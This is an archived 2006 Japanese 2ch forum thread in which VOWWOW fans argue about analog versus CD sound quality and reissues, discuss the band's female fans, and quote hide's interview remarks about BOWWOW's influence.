166 :伝説の名無しさん:2006/07/16(日) 15:21:38
プチプチいわないのがCDのいいところ。
カートリッジとかを変えて音を変えられる(楽しみがある)のがアナログのいいところ。

ビートルズもファーストプレスは高額で取引されている。
前、FM放送でわざわざレコードで流していたけれど、「このスタジオにはステレオ用のカートリッジしかない」と断りを入れていた。

とはいえ、普通にCDで聴ければそれでいいよ。

167 :伝説の名無しさん:2006/07/16(日) 16:04:16
さすが年長者ぞろいのスレですね

皆さんに質問です。いわゆるマスターテープ(音源・映像)の耐久年数って
どれくらいなのでしょうか

168 :伝説の名無しさん:2006/07/16(日) 16:30:43
イタリアのパンコのCDなんてリマスターされた方が音悪かったな
VOWWOWもアルバムによってはマスター劣化してる物があるかもしれないね

169 :伝説の名無しさん:2006/07/16(日) 17:29:20
アナログをレーザーターンテーブルで聴くのが最強と思うんだが、そこらへん、どうなのかな?

ちなみに、東京だと国立国会図書館でレコード&レーザーターンテーブルが聴けるね。

170 :伝説の名無しさん:2006/07/16(日) 19:02:39
レーザーだと盤に低負荷だから図書館で採用されているんだろうが
音質上のメリットはそれほどないのではないか
傷や埃があれば音に反映するしエラー訂正機能もないわけだから
アナログやデジタルのフィルターで対応する方法もあるかもしれない
でもそれなら針方式出力を取込んで波形編集しても似たようなものだろ

171 :伝説の名無しさん:2006/07/17(月) 09:07:11
つか、今時アナログマンセーしてるのはごく一部の偏屈オヤジだけだろ。
普通は磨耗による劣化やノイズ発生でプレイヤーにかけるのさえイヤになる。
にしても今までさんざん「CD再販汁!」とかいっておいて
いざ出ると決まったら今度は「LPの方が音がいい」
なんて流れになるのは、結局何出しても買う気ねえんだろ?
と思わざるをえない。

172 :伝説の名無しさん:2006/07/17(月) 09:40:34
いやいや買いますともCD

173 :伝説の名無しさん:2006/07/17(月) 11:20:51
俺は「BEAT OF METAL MOTION」だけ買うつもり、あとはベストの選曲でたくさん

174 :伝説の名無しさん:2006/07/17(月) 12:19:49
>>171
「再販しろ」は現行カタログにないのはおかしいというのが出発点の話
「アナログ盤は音がいい」というのはなるべくいい音で楽しみたいというのが出発点の話
これまでも「再販するならいい音で」「同じでいいから早期の再販」というのは同時にあった
再販自体が確定的になったら音質に関連する論議が目立ってくるのは自然な流れ

175 :伝説の名無しさん:2006/07/17(月) 12:53:02
自然な流れというよりただ頭でっかちプログレマニアオヤジが理屈こねたいだけに見える

176 :伝説の名無しさん:2006/07/17(月) 13:00:06
でも、どうせ買うなら良い物を買いたい裏ジャケットなしとかはやめてほしい


177 :伝説の名無しさん:2006/07/17(月) 15:54:06
>>174
だからといってアナログ云々なんて言い出すのは
いい年したオヤジが無い物ねだりしてるに過ぎない

178 :伝説の名無しさん:2006/07/17(月) 19:01:31
アナログでの再発は可能なのに
なんで無い物ねだりになるんだろ

179 :伝説の名無しさん:2006/07/17(月) 20:31:47
>>178のオヤジはVOWのLPの再販なんて
本気であると信じてるのだろうか?


180 :伝説の名無しさん:2006/07/17(月) 21:55:42
なんで信じる信じないの問題にしたいのかわからんな
あと現実的か非現実的かの問題にしたがる奴もいそうだな
そんなこと気にしてどうする
何を望むかの問題だろ、自由に語ればいいんでないの
マウンテントップのアナログ盤はマジで欲しい
再発になるのか初アナログ盤化になるのかはしらんが

181 :伝説の名無しさん:2006/07/18(火) 00:47:31
>>178>>180
しつこいぐらいにいやなオヤジだ
さすが脳内膨張プログレヲタは違う

182 :伝説の名無しさん:2006/07/18(火) 08:08:12
雑音や音質低下にさえ気づかずLPマンセーする偏屈オヤジなんて
耳も頭もおかしいんだろ

183 :伝説の名無しさん:2006/07/18(火) 12:40:40
>>180
CDアナログにしてくれる所あるだろネットで探せよ

184 :伝説の名無しさん:2006/07/19(水) 01:36:10
>>183
それじゃ意味ないよ。
実際に聴き比べてみると判るけど、CDの音やmp3などに変換した音は聴き疲れする。
アナログ盤の音がやわらかく、あたたかい音に聴こえるのは、やはり可聴音域の問題だろう。
まあ、最近は一部の音質マニアの為にSACDなんかがあるけどね。


185 :伝説の名無しさん:2006/07/19(水) 01:44:14
やはり新品のアナログ盤を最高のシステムで聴くのが、最高に贅沢な聴き方だね。

20年ほど前、買ったばかりのIIIのLP盤をオーディオ・オタクの友人宅のシステム(総額300万超!)で
大音量で聴かせてもらったことがあったが、最高だったな。

その友人は、クラシックとJAZZしか聴かんヤツだったけど無理矢理お願いして、VOWWOWのレコードを
かけてもらった。

ちなみに、タンノイとボーズとJBLのスピーカーで聴かせてもらったが、JBLが一番良かったなあw

186 :伝説の名無しさん:2006/07/19(水) 02:17:24
絶対ウソ↑
IIIは高級システムで聞いて映えるような
音じゃない。破綻します。
もし良かったと思えるのなら
大音量の効果しかないよ。

187 :伝説の名無しさん:2006/07/19(水) 18:21:39
>185
のシステムは俺からすれば十分に高級システムだが、オーディオ「地獄」にはまっている輩からすればそれほどでもなかったりする。

>186
は絶対とか書くのは安っぽいからやめたほうがいいと思うよ。
スピーカーの中でJBLを挙げている辺り、信憑性を感じる。

188 :伝説の名無しさん:2006/07/19(水) 20:42:27
187は185? 信憑性て?

189 :伝説の名無しさん:2006/07/19(水) 22:16:01
>>187はオレじゃないよ。

JBLでも、あの頃流行っていたバススピーカーが白いヤツでした(型番失念)

タンノイは、音がやたらと柔らか過ぎて合わなかった。

ちなみに、アンプは確か真空菅(アキュフェーズ?)だったかな。

190 :伝説の名無しさん:2006/07/19(水) 23:37:43
その手の比較はCDも同じ金額をかけた環境で再生した上で
比べないと意味がないはずだけど。

つか、そこまで金かけなきゃ違いが分からないような代物なら
殆どの人にとってはやはり無用の長物でしかないだろう。

191 :伝説の名無しさん:2006/07/20(木) 00:10:14
ま、趣味のオーディオってなそんなもんだわな。

俺もそこまで拘るほどの音作りをVOWがしているとは思わないけどね。
恭司君のギターだってエライ拘りの造りになっているけど、それがどの程度、
音に反映されているかというと?????

192 :伝説の名無しさん:2006/07/20(木) 06:06:22
オレは、VOWをアナログ盤とCDで全部持ってるが
やはりアナログ盤の音がよかったな。

CDには20Hz以下と20KHz以上の音が記録されてないからか
特にドラムとベースの音の立体感が違うのよ…w

そのメリットからすれば、アナログ盤特有のスクラッチノイズ
なんかは全然問題じゃないんだけどなあ。


まあ、どうでも良い人には、どうでも良い話なんだろうけどねw

193 :伝説の名無しさん:2006/07/20(木) 06:10:43
どーでもいい

194 :伝説の名無しさん:2006/07/20(木) 16:25:57
ノイズさえ気にならない程度の耳で
音質がどうこう言ってる奴は当然磨耗劣化にも気づいてないだろうな


195 :伝説の名無しさん:2006/07/20(木) 19:13:43
Vは発売当時、ビートルズのホワイトアルバムを狙ったとかで
バカほど音入れたけどほとんど聞こえないくらいのトラックが沢山あり
聴くたびに新鮮な発見があるみたいに本人達が言っとったけど
実際どうよ、或いはどうだったよ
オレはそれこそ最初のうちはたまにオッというのはあったけど、どうだった?

196 :伝説の名無しさん:2006/07/20(木) 22:57:41
可聴音域は音感なんかと同じで、人によって差があって、たとえアナログ盤と
CDを同じ条件で聴いても、違いの分からないヤシには分からないらしい。

まあ、安っぽい耳の持ち主には高圧縮MP3の音質で充分ってことかな。

アナログ盤=ノイズ、みたいに短絡思考しかできない幼児には特にねw


197 :伝説の名無しさん:2006/07/20(木) 23:01:30

(笑)

198 :伝説の名無しさん:2006/07/20(木) 23:29:25
バンドや吹奏楽・オケをやる方ならともかく、
生音を聴く機会のほとんど無い人は
CDと生音とでは、音の迫力や艶が全く違う、という事実を実感できません。

それと同じで、
アナログ盤の音に触れる機会の無い人(含む:俺)には
CD/DVDとアナログ盤の違いはわかんないんですよね。


生の演奏に触れる機会が多かったら
不可聴音域の存在意義も実感できると思うんですけどね・・・

199 :伝説の名無しさん:2006/07/21(金) 05:58:50
一見高尚な基粟を続けているようだがHardRockは和製英語論議してるやつと大差無い気がする


200 :伝説の名無しさん:2006/07/21(金) 06:52:46
そもそもスタジオ盤なんて楽器ごとに録音して適当にパンして並べてあるだけじゃないか。
ライブ録音ならいざ知らず、トラック毎に手が加えられた音源をどうやって原音再生するのかとw

アナログ/デジタルの音の違いを語るなど無意味。無意味だよ。

201 :伝説の名無しさん:2006/07/21(金) 09:27:01
もはや粗大ゴミでしかないオーディオ機材を自慢したいアナログオヤジが
必死になって「LPの方が音がいい」とか言い張ってるだけだろ




202 :伝説の名無しさん:2006/07/21(金) 16:15:15
確かに、クラシック、ジャズのライブ音源なんかでは差は歴然なんだがな。

メタル系の音楽は…。って所だろうが、IIIはプログレの要素が強い楽曲が多いし
実は、かなり計算された音の作りになってるからな。


203 :伝説の名無しさん:2006/07/21(金) 22:40:12
Vは音がすっきりSN比が良好で音像が明快
Xは、音の質は高いが、輪郭がぼやけて、もこもこですっきりしてない
是非、Vを明快な音でリマスターして欲しい

204 :伝説の名無しさん:2006/07/22(土) 16:53:46

NIGHTLESS CITYがようつべに、うpされたね。

205 :伝説の名無しさん:2006/07/22(土) 20:03:17
TVKライヴトマトで放送した
最初の武道館(ベースはニール)だね。

206 :伝説の名無しさん:2006/07/23(日) 01:17:13
NIGHTLESS CITYは、PVのヤツが一番いい。

つーかIIIはLIVE版よりアルバム音源の方が完成度高い。

207 :伝説の名無しさん:2006/07/23(日) 01:31:04
うわっ!鬼女板のメタルスレがいつの間にかVOWスレ化してるぞ!
なんてこったw

208 :伝説の名無しさん:2006/07/23(日) 01:37:26
>>206
サイクロンと逆だね

209 :伝説の名無しさん:2006/07/23(日) 02:09:14
>>207
ホントだ!
ていうか、このスレに愛想つかした♀ファンがあっちに移動した
のじゃあるまいか???

210 :伝説の名無しさん:2006/07/23(日) 09:18:32
鬼女板なんて逝ったことないや。

・・・・・・ちょっくら覗いて来よう。

211 :伝説の名無しさん:2006/07/23(日) 12:54:21
>>208
CYCLONEって路線的にはIIIと同じなんだけど、音を比べちゃうと
ちょっとPOPな感じで軽いんだよな。

212 :伝説の名無しさん:2006/07/23(日) 12:57:46
>>210
あそこは男子禁制だからなあ。
くれぐれもネカマはやめてねw

213 :伝説の名無しさん:2006/07/23(日) 13:13:34
>>212
私は女なんで・・・でも独身だから書き込まない。
一気に全部読んできた。面白かったよ。

IIIもいいけど、Vも同じくらい好きだ。初めて買ったCDだ(レコードではない)。

214 :伝説の名無しさん:2006/07/23(日) 14:58:12
>>213
私も噂をきいて鬼女板見てきた毒女です。面白かったですね

215 :伝説の名無しさん:2006/07/23(日) 16:18:10
このスレ・・そんなに女性が居たの!!驚

216 :伝説の名無しさん:2006/07/23(日) 16:41:33
女性ファン結構多いのかなぁ。私も♀。

217 :伝説の名無しさん:2006/07/23(日) 17:22:45
というか鬼女板にメタルスレがあることすら知らなかった

218 :伝説の名無しさん:2006/07/23(日) 20:29:56
そういや「人見元基」で検索して発見したブログの主は中年女性だった。
解散後に夫の影響で人見オタになったらしい。
あのフェロモンゼロな人見に欲情するとか書いてあった。
それ読んで漏れは強烈な寒気と共にドン引きしたが・・
塾の国語の先生だかwebライターだかやってるそうで、
「元基の良さが解ってるインテリなワテクシ」のウンチク話に吐き気がしたなあ。。

219 :伝説の名無しさん:2006/07/23(日) 21:34:11
鬼女スレのなんていう名前のスレ?
メタルスレが見つからないんだけど

220 :伝説の名無しさん:2006/07/23(日) 21:37:27
話の輪に入れないやつがいる

221 :伝説の名無しさん:2006/07/23(日) 23:00:33
>>219
『奥様がヘヴィメタルを語ると凄い』

222 :伝説の名無しさん:2006/07/23(日) 23:06:16
>あのフェロモンゼロな人見

でも、上のレスのよると女好きするタイプのようだ。

223 :伝説の名無しさん:2006/07/23(日) 23:27:11
あっちにも変なのが行かなきゃいいけどな。

224 :伝説の名無しさん:2006/07/24(月) 00:05:33
そのテのインテリ女て、普通に
「VOWWOWが好き」とか「人見元基のファンだ」とか言えんのかね。

225 :伝説の名無しさん:2006/07/24(月) 08:53:09
>>218
>>インテリなアテクシ

そうか。あのブログせっかく元基のことを書いてくれてるのに読後感が悪いのは
行間から「インテリなアテクシ」臭がしてたからなのかww

英語の歌詞の意味が理解できてるアテクシな日記では
”おまいが歌詞を和訳せんでも皆意味わかって聴いてますから”
とつっこみたくなったし。
まあ理屈っぽい人に好かれるんだろねVOWWOWは。

226 :伝説の名無しさん:2006/07/24(月) 13:36:08
勝手に「書いてくれてる」なんて思って読んで著者を論評してる方が笑える
ファンがどうかとかファンにどういう奴がいるかは別スレ立てた方が面白いのでは

227 :伝説の名無しさん:2006/07/24(月) 18:13:47
だからと言って元基マンセーの馴れ合いサイトもどうかと。

中年女がライブで猫耳つけてて
そっちの方にドン引きした


228 :伝説の名無しさん:2006/07/24(月) 19:24:25
元基ファンの揉め事はうんざりだ
ヨソでやれ

http://music4.2ch.net/test/read.cgi/hrhm/1151059741/

229 :伝説の名無しさん:2006/07/24(月) 19:48:31
既女板見てきた。
意外と言っちゃあ何だがマトモな良スレであった。


230 :伝説の名無しさん:2006/07/24(月) 21:06:11
でも前ここでバウファンの女性は髪が長くてオタクっぽい暗いタイプが多かったとかいってたよね

231 :伝説の名無しさん:2006/07/24(月) 21:08:21
>>227
自分以外のリスナーのことをなんでそんなに気にするんだ?
所詮は他人事じゃないか

232 :伝説の名無しさん:2006/07/24(月) 22:34:06

笑えます。
http://www.youtube.com/watch?v=RSizsFSOd84&NR


233 :伝説の名無しさん:2006/07/26(水) 11:25:03
RAINBOWもかっこいいね。
"Death Alley Driver"
http://www.youtube.com/watch?v=QmHAmoGbDVE

234 :伝説の名無しさん:2006/07/27(木) 00:15:01
既女板見てきたが、メタルスレがどうしても見つからん
奥様オナニースレばかり目に入って、行き着かん

235 :伝説の名無しさん:2006/07/27(木) 00:19:31
嘘つくなよ検索で一発だろ

236 :伝説の名無しさん:2006/07/27(木) 01:26:30
>>234
>>221にスレタイあるじゃん

育児板のインギースレもよろw

237 :伝説の名無しさん:2006/07/27(木) 22:37:41
すんまそん
検索ってどうやるの?

238 :伝説の名無しさん:2006/07/27(木) 23:43:51
>>237
このスレにどうやって来たの?

239 :伝説の名無しさん:2006/07/28(金) 00:08:35
検索しなくても来れるだろ??
馬鹿か?

240 :伝説の名無しさん:2006/07/28(金) 02:19:11
検索機能は一度も使ったことがありませんでした
どばーっあるタイトルを目を皿のようにして
全部見て、探してました
いやこれ本当

241 :伝説の名無しさん:2006/07/28(金) 02:59:52

既女板のスレ一覧のところで、CTL+F。

で、「メタル」とでも入力してEnter。

それか、2ch検索を探せば、楽だが。


242 :伝説の名無しさん:2006/07/28(金) 04:20:31
みんな思わせぶり。素直に教えてあげれば良いのに。
VOWWOWファンの特徴なのか。
http://human5.2ch.net/test/read.cgi/ms/1146929563/l50#tag814

243 :伝説の名無しさん:2006/07/28(金) 06:56:52
>>242
>>221

244 :伝説の名無しさん:2006/07/28(金) 09:21:22
>>242 しかしVOWWOWの話題は既に終わっている模様。

245 :伝説の名無しさん:2006/07/28(金) 12:26:55
― あと、歌詞を第三者的な人(森 雪之丞)が書くっていうのも初の試みだよね?
「うん。もともとああいう詞をつけるつもりだったんだけど俺にはこの詞は書けんぞと。
で、“外注”っていうのにも抵抗はなかったから」
― 書けないっていうのは?
「う〜ん、単純に今書けないぞと思っただけ(笑)。特に理由はなく、本当にそれだけだったかな」
― でも、森雪之丞さんって割と歌謡曲畑の人なんでしょう?
「俺全然知らなかったの。どっちかっていうと布袋さんとかで知ったから。
シブがき隊とか書いてるって全然知らなくて。
でも会って話したら、BOWWOWの日本語の詞とかやってたり。
『WARNING FROM STARDUST』はA面が英詞どB面が日本語だったんだけど、それが
俺の一番好きなアルバムだったから」
― それはでも、発注した後に知ったんだ?
「そう。初めて会わせてもらった時に、たまたまBOWWOWもやったことあるみたいなこと言ってて
“え、僕追っかけだったんですよって(笑)
あと一緒に飲んでる時にモヤモヤとしたことを言っても“わかるわかる”
って言ってくれる感じがあったから、これは(一緒に)できるなと思って」


宝島社 『hide DAYS』より

246 :伝説の名無しさん:2006/07/28(金) 12:40:37
― (高校)当時のギターヒーローというと?
「一番気になってたってか、好きだったのはBOWWOW。
アルバムが出た時に、今度はギターで何をやってるだろうって。
そのことがギター雑誌とかに載るとすごいドキドキしてた」

247 :伝説の名無しさん:2006/07/28(金) 12:50:55
MGギターを使い始めたのは?
「BOWWOWに出会った時。これも友達の間で流行ったんだ。
フェルナンデスのBCリッチのコピーシリーズが。
なんか割と友達の流行り廃りが結構影響してるんだよね。
それでお茶の水まで買いに行ってしかもスイッチいっぱい付いてるのを買った。
一番グレードの高いやつを。ブースター一個のもあったんだけどお店のお兄ちゃんに
“こっちはブースター一個でこうでしょ、だけど二個入れるとダーン!”
とか言われてもう参ったって(笑)
とにかくシェイプが好きだったんだよね。それでMGを買って、
本格的に練習始めた頃にバンドをやった。
俺、バンド組んだのは遅いんですよ。高校3年ぐらいだったから。
サーベル・タイガーが初めてのバンドなの」

248 :伝説の名無しさん:2006/07/28(金) 13:17:52
hideちゃんのソロの曲ってBOWWOWの影響ありまくりですよね。
「ROCKET DIVE」やら「PINK SPIDER」とか。

249 :伝説の名無しさん:2006/07/28(金) 14:14:46
松本裕士
兄・松本秀人、そしてアーティストhideを語る
P.104

「あの人自身、少年時代大好きだったバウワウの解散にすごく“裏切られた”と感じたみたいで。
それは実際よく言ってましたね。“なんで裏切るんだ?だからオトナは嫌いだ!”みたいなことを」

松本弟、KISSと勘違いしてる

250 :伝説の名無しさん:2006/07/28(金) 16:13:46
東芝EMI関連会社社長、無念の自殺か

251 :伝説の名無しさん:2006/07/28(金) 17:06:59
シェイカーもファンクラブ先導でカナダのバンクーバーのライブツアーやったそうですね
いいな

252 :伝説の名無しさん:2006/07/28(金) 19:23:41
>>249
ん?KISSこそ解散してないぞ?
BOWWOWと書いてあるのはVOWWOW
なんじゃね?

52 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)